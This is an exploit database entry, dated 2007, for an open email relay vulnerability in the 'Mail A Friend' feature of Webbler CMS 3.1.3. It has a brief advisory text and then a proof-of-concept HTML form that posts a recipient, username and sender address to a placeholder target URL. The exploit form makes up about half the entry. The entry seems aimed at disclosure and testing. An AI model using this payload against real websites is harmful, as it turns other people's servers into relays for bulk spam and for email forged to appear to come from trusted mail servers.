Webbler CMS 3.1.3 - Mail A Friend Open Email Relay

2007-07-24T00:00:00
ID EXPLOITPACK:B7B951597AD9313D9CEBC0759CF13997
Type exploitpack
Reporter Adrian Pastor
Modified 2007-07-24T00:00:00

Description

Webbler CMS 3.1.3 - Mail A Friend Open Email Relay

                                        
                                            source: https://www.securityfocus.com/bid/25045/info

The 'webbler' is prone to an open-email-relay vulnerability.

An attacker may leverage the issue to use webservers that are hosting the vulnerable software to send arbitrary unsolicited bulk email. Attackers may also forge email messages that originate from trusted mail servers.

This issue affects webbler 3.1.3; prior versions may also be affected. 

 <form method="post" action="http://www.target-domain.com/?lid=12506">
        <input type="hidden" name="code" value="4672577a2d323">
        <input type="hidden" name="referral_uri" value="">
        <input type="hidden" name="document_title" value="">
        <input type="text" name="recipient" value="">
        <input type="text" name="username" value="">
        <input type="text" name="useremail" value="">
        <INPUT class="sendbutton" type=submit name=sa VALUE="send page">
        </form>